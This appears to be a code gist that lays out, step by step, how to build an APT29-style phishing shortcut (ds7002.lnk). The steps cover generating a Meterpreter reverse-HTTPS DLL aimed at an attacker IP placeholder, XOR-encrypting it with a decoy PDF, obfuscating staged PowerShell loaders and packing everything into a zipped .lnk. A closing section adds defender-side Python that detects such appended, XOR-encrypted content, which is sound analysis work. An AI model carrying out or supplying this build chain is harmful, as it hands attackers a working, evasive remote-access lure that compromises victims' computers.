@refabr1k
Created October 5, 2024 04:35

lnk payload (APT29 phishing) ds7002.lnk

Step 2: Generate and Obfuscate a Meterpreter DLL

# Generate a new Meterpreter DLL payload
msfvenom -p windows/x64/meterpreter/reverse_https -f dll LHOST=<YOUR ATTACKER IP ADDRESS> LPORT=443 -o meterpreter.dll

# XOR encrypt the Meterpreter DLL using the provided xor_encrypt.py script, with the letter ‘a’ as the encryption key:
python3 xor_encrypt.py -i meterpreter.dll -o meterpreter.dll_enc -k a

Step 3: Obfuscate the Decoy PDF
python3 xor_encrypt.py -i ds7002.pdf -o ds7002.pdf_enc -k a

# Step 4: Prepare the Stage 2 PowerShell Loader
# loader.ps1 is the stage 2 script; it reads the DLL and the decoy PDF out of the .LNK using their specific file lengths

# Step 5: Obfuscate and Base64 Encode the PowerShell Stage 2 Loader
python3 PyFuscation.py -fvp --ps loader.ps1
# copy output to loader_obf.ps1 (the next step base64-encodes it into loader_obf.ps1_enc)

# Base64 encode the newly obfuscated PowerShell loader script, using UTF-8 encoding.
cat loader_obf.ps1 | iconv --to-code UTF-8 | base64 -w 0 > loader_obf.ps1_enc

# Step 6: Prepare the PowerShell Stage 1 Loader
# Replace the 0s in $script_length with the length of loader_obf.ps1_enc, save stage1_command.ps1 (File > Save), and close mousepad to return to the terminal.

# Step 7: Obfuscate the PowerShell Stage 1 Loader
python3 PyFuscation.py -fvp --ps stage1_command.ps1
# copy output to stage1_command_obf.ps1

# Base64 encode the obfuscated script with UTF-16LE encoding. This is the format PowerShell expects when natively evaluating encoded commands.
cat stage1_command_obf.ps1 | iconv --to-code UTF-16LE | base64 -w 0

# store the base64 blob in a shell variable so the next step can pass it on the command line
ENCODED_COMMAND="paste your base64 blob here"

# Step 8: Bundle Payload Components into a Shortcut File (.LNK)
# the icon path is single-quoted so the shell does not strip the backslashes
python3 evillnk.py -n ds7002.lnk -c $ENCODED_COMMAND --icon 'C:\Windows\System32\SHELL32.dll' --index 1

# append the XOR encrypted PDF file to the .LNK file, starting from position 0x3000, using append_file.py.
python3 append_file.py -s ds7002.pdf_enc -d ds7002.lnk --seek 0x3000

# append the XOR encrypted Meterpreter DLL to the .LNK file, starting from position 0x30000.
python3 append_file.py -s meterpreter.dll_enc -d ds7002.lnk --seek 0x30000

# append the Base64 encoded PowerShell loader script to the .LNK file at position 0x5e2be.
python3 append_file.py -s loader_obf.ps1_enc -d ds7002.lnk --seek 0x5e2be

# Step 9: Place Shortcut File (.LNK) into a Zip Archive
zip ds7002.zip ds7002.lnk
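A defender-side check for shortcuts bundled this way: the walkthrough leaves a decoy PDF and a DLL appended past the end of the shell link structure, each XOR-encrypted with a single byte, and the stage 1 command sits in the shortcut's Arguments string. The Python below is an added example (not code from the gist or from the lab tooling it references): it walks the MS-SHLLINK structure to find where the legitimate .lnk ends, reports the Arguments string and the trailing bytes, and brute-forces the single-byte XOR key under which a PDF header or the PE DOS-stub text appears in them. build_sample() is a constructed stand-in file; its offsets, argument string and marker strings are assumptions, not taken from the real ds7002.lnk.

```python
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_ARGUMENTS, IS_UNICODE = 0x01, 0x02, 0x20, 0x80
STRING_FLAGS = (0x04, 0x08, 0x10, HAS_ARGUMENTS, 0x40)  # Name, RelativePath, WorkingDir, Arguments, IconLocation
# Heuristic plaintext markers for the two file types the walkthrough appends: PDF header, PE DOS-stub text
MARKERS = {"pdf": b"%PDF-", "pe": b"This program cannot be run in DOS mode"}

def parse_lnk(data: bytes) -> dict:
    """Walk the shell link structure: Arguments string, end offset, and every byte past that end."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, width, arguments = LNK_HEADER_SIZE, (2 if flags & IS_UNICODE else 1), ""
    if flags & HAS_ID_LIST:      # IDListSize (u16) followed by the IDList itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:    # LinkInfoSize (u32) includes its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    for flag in STRING_FLAGS:    # CountCharacters (u16) + characters, no NUL terminator
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            if flag == HAS_ARGUMENTS:
                raw = data[pos + 2:pos + 2 + count * width]
                arguments = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += 2 + count * width
    while (size := struct.unpack_from("<I", data, pos)[0]) >= 4:  # ExtraData blocks until TerminalBlock
        pos += size
    pos += 4                     # the 4-byte TerminalBlock closes the structure; a clean .lnk ends here
    return {"arguments": arguments, "structure_end": pos, "trailing": data[pos:]}

def find_xored_marker(blob: bytes, marker: bytes):
    """Brute-force the single-byte XOR key under which marker occurs in blob -> (offset, key) or None."""
    for key in range(256):
        off = blob.find(bytes(b ^ key for b in marker))
        if off != -1:
            return off, key
    return None

def build_sample() -> bytes:
    """Constructed stand-in for a bundled shortcut (not the real ds7002.lnk): a minimal unicode .lnk with
    only an Arguments string, then a PDF and a PE stub appended past the structure, XOR'ed with 'a'."""
    xor = lambda b: bytes(c ^ ord("a") for c in b)
    args = "-nop -w hidden -enc QUJD"   # placeholder encoded command, not a real payload
    lnk = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", HAS_ARGUMENTS | IS_UNICODE)
           + bytes(52) + struct.pack("<H", len(args)) + args.encode("utf-16-le") + bytes(4))
    lnk = lnk.ljust(0x300, b"\0") + xor(b"%PDF-1.7 decoy document")
    return lnk.ljust(0x600, b"\0") + xor(b"MZ" + bytes(62) + b"This program cannot be run in DOS mode")
```

On a real file, a non-empty `trailing` on a shortcut whose Arguments contain an encoded command is the signal worth alerting on; the recovered key lets an analyst carve and identify the embedded files.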